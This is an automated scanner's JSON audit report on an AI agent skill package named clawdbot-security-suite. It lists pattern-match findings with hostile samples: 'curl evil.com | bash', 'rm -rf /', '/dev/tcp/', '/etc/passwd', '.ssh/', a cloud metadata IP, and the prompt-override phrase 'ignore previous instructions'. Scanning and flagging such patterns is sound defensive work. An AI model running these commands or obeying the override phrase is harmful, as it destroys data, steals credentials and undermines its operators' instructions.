{ "trust": { "tier": "Dangerous", "emoji": "🔴", "description": "Multiple critical issues — do not install without thorough manual review", "score": 20 }, "format": "skill", "skill": { "name": "security", "description": "Advanced security validation for Clawdbot - pattern detection, command sanitization, and threat monitoring", "version": null, "slug": "clawdbot-security-suite" }, "scores": { "security": 0, "transparency": 7, "maintenance": 8, "overall": 2 }, "permissions": { "summary": "Requires 1 system binary.", "environmentVariables": [], "binaries": [ { "name": "jq", "risk": "medium" } ], "envVarCount": 0, "requiredBinCount": 1 }, "compoundThreats": [ { "id": "memory_exfiltration", "severity": "critical", "description": "Accesses agent memory/notes AND sends data externally — may leak personal data", "capabilities": [ "agent_memory", "network_out" ], "owasp": [ "LLM02", "LLM07" ], "owaspAsi": [ "ASI03", "ASI06" ] }, { "id": "memory_leak", "severity": "high", "description": "Accesses agent memory AND sends data externally — may leak conversation history", "capabilities": [ "agent_memory", "network_out" ], "owasp": [ "LLM02", "LLM07" ], "owaspAsi": [ "ASI06" ] } ], "permissionIntegrity": [ { "type": "undeclared_capability", "severity": "high", "description": "Makes network requests but does not declare curl/wget in required binaries", "declared": [ "jq" ], "actual": "network_out", "owasp": [ "LLM06" ], "owaspAsi": [ "ASI02" ] }, { "type": "sensitive_access", "severity": "high", "description": "Accesses agent memory/configuration files", "actual": "agent_memory", "owasp": [ "LLM06" ], "owaspAsi": [ "ASI02" ] } ], "capabilities": [ "agent_memory", "network_out" ], "findings": [ { "severity": "critical", "category": "shell_injection", "description": "Recursive delete from root or home — destructive command", "zone": "code", "zoneContext": "instruction", "file": "SKILL.md", "downgraded": false, "sample": "rm -rf /", "owasp": [ "LLM05", "LLM06" ], "owaspAsi": [ "ASI02", "ASI05" ], "confidence": "pattern" }, { "severity": "critical", "category": "prompt_injection", "description": "Prompt injection — tries to override agent instructions", "zone": "code", "zoneContext": "instruction", "file": "SKILL.md", "downgraded": false, "sample": "ignore previous instructions", "owasp": [ "LLM01" ], "owaspAsi": [ "ASI01", "ASI09" ], "confidence": "pattern" }, { "severity": "critical", "category": "shell_injection", "description": "Pipe-to-shell pattern (curl | sh) — supply chain attack vector", "zone": "code", "zoneContext": "instruction", "file": "SKILL.md", "downgraded": false, "sample": "curl evil.com | bash", "owasp": [ "LLM05", "LLM06" ], "owaspAsi": [ "ASI02", "ASI05" ], "confidence": "pattern" }, { "severity": "high", "category": "shell_injection", "description": "Pipe-to-shell pattern (wget | sh)", "zone": "prose", "zoneContext": "documentation", "file": "hooks/security-validator/HOOK.md", "downgraded": true, "sample": "wget | sh", "owasp": [ "LLM05", "LLM06" ], "owaspAsi": [ "ASI02", "ASI05" ], "confidence": "pattern" }, { "severity": "critical", "category": "shell_injection", "description": "Pipe to bash — executes piped content as shell commands", "zone": "code", "zoneContext": "instruction", "file": "SKILL.md", "downgraded": false, "sample": "| bash", "owasp": [ "LLM05", "LLM06" ], "owaspAsi": [ "ASI02", "ASI05" ], "confidence": "pattern" }, { "severity": "high", "category": "shell_injection", "description": "Pipe to sh — executes piped content as shell commands", "zone": "prose", "zoneContext": "documentation", "file": "hooks/security-validator/HOOK.md", "downgraded": true, "sample": "| sh", "owasp": [ "LLM05", "LLM06" ], "owaspAsi": [ "ASI02", "ASI05" ], "confidence": "pattern" }, { "severity": "high", "category": "network", "description": "HTTP request to bare IP address — common in malicious payloads", "zone": "code", "zoneContext": "instruction", "file": "SKILL.md", "downgraded": false, "sample": "http://169.254.169.254", "owasp": [ "LLM02", "LLM06" ], "owaspAsi": [ "ASI03", "ASI07" ], "confidence": "pattern" }, { "severity": "high", "category": "code_execution", "description": "Uses eval() — can execute arbitrary code", "zone": "prose", "zoneContext": "documentation", "file": "CONTRIBUTING.md", "downgraded": true, "sample": "eval(", "owasp": [ "LLM05", "LLM06" ], "owaspAsi": [ "ASI02", "ASI05" ], "confidence": "pattern" }, { "severity": "medium", "category": "code_execution", "description": "Uses exec() — may execute shell commands", "zone": "prose", "zoneContext": "documentation", "file": "CONTRIBUTING.md", "downgraded": true, "sample": "exec(", "owasp": [ "LLM05", "LLM06" ], "owaspAsi": [ "ASI02", "ASI05" ], "confidence": "pattern" }, { "severity": "medium", "category": "code_execution", "description": "References child_process — can spawn system processes", "zone": "prose", "zoneContext": "documentation", "file": "hooks/security-validator/handler.ts", "downgraded": true, "sample": "child_process", "owasp": [ "LLM05", "LLM06" ], "owaspAsi": [ "ASI02", "ASI05" ], "confidence": "pattern" }, { "severity": "high", "category": "filesystem", "description": "Accesses sensitive system files", "zone": "prose", "zoneContext": "documentation", "file": "hooks/security-validator/HOOK.md", "downgraded": true, "sample": "/etc/passwd", "owasp": [ "LLM06" ], "owaspAsi": [ "ASI02" ], "confidence": "pattern" }, { "severity": "high", "category": "shell_injection", "description": "Bash /dev/tcp — raw TCP connection via shell", "zone": "prose", "zoneContext": "documentation", "file": "skills/security/patterns.json", "downgraded": true, "sample": "/dev/tcp/", "owasp": [ "LLM05", "LLM06" ], "owaspAsi": [ "ASI02", "ASI05" ], "confidence": "pattern" }, { "severity": "medium", "category": "credentials", "description": "Accesses .ssh directory", "zone": "prose", "zoneContext": "documentation", "file": "skills/security/patterns.json", "downgraded": true, "sample": ".ssh/", "owasp": [ "LLM02" ], "owaspAsi": [ "ASI03" ], "confidence": "pattern" }, { "severity": "low", "category": "obfuscation", "description": "Base64 encoding/decoding", "zone": "prose", "zoneContext": "documentation", "file": "skills/security/patterns.json", "downgraded": true, "sample": "base64_decode", "owasp": [ "LLM01", "LLM03" ], "owaspAsi": [ "ASI04", "ASI10" ], "confidence": "pattern" }, { "severity": "critical", "category": "threat_intelligence", "description": "URL flagged by 5/94 VirusTotal engines: https://clawdhub.com/gtrusler/clawdbot-security-suite", "zone": "code", "zoneContext": "instruction", "file": null, "downgraded": false, "sample": "https://clawdhub.com/gtrusler/clawdbot-security-suite", "owasp": [ "LLM03" ], "owaspAsi": [ "ASI04" ], "confidence": "external" } ], "summary": { "total": 15, "critical": 5, "high": 6, "medium": 3, "low": 1, "compoundThreats": 2, "integrityIssues": 2 }, "trustSignals": { "positive": [ { "signal": "described", "positive": true, "detail": "Has meaningful description" }, { "signal": "packaged", "positive": true, "detail": "Has package.json" }, { "signal": "minimal_env", "positive": true, "detail": "No environment variables required" }, { "signal": "documented", "positive": true, "detail": "SKILL.md has substantial documentation" } ], "negative": [ { "signal": "versioned", "positive": false, "detail": "No version declared" }, { "signal": "complex_structure", "positive": false, "detail": "17 files — larger attack surface" } ] }, "files": { "hasExecutableCode": true, "executableFiles": [ "hooks/security-validator/handler.ts", "skills/security/security.sh" ], "totalFiles": 17 }, "humanSummary": "security scores 20/100 (Dangerous). It requires 1 binaries. Accesses agent memory/notes AND sends data externally — may leak personal data. 1 undeclared capability detected — the skill does more than its permissions suggest. 4 critical pattern matches in code.", "auditedAt": "2026-04-25T08:29:35.874Z", "vtEnrichment": { "checked": 3, "flagged": 1, "urls": [ { "url": "https://x.com/LexpertAI", "malicious": 0, "suspicious": 0, "engines": 0, "cached": false }, { "url": "https://img.shields.io/badge/ClawdHub-Install-blue", "malicious": 0, "suspicious": 0, "engines": 94, "cached": false }, { "url": "https://clawdhub.com/gtrusler/clawdbot-security-suite", "malicious": 5, "suspicious": 1, "engines": 94, "cached": false } ] } }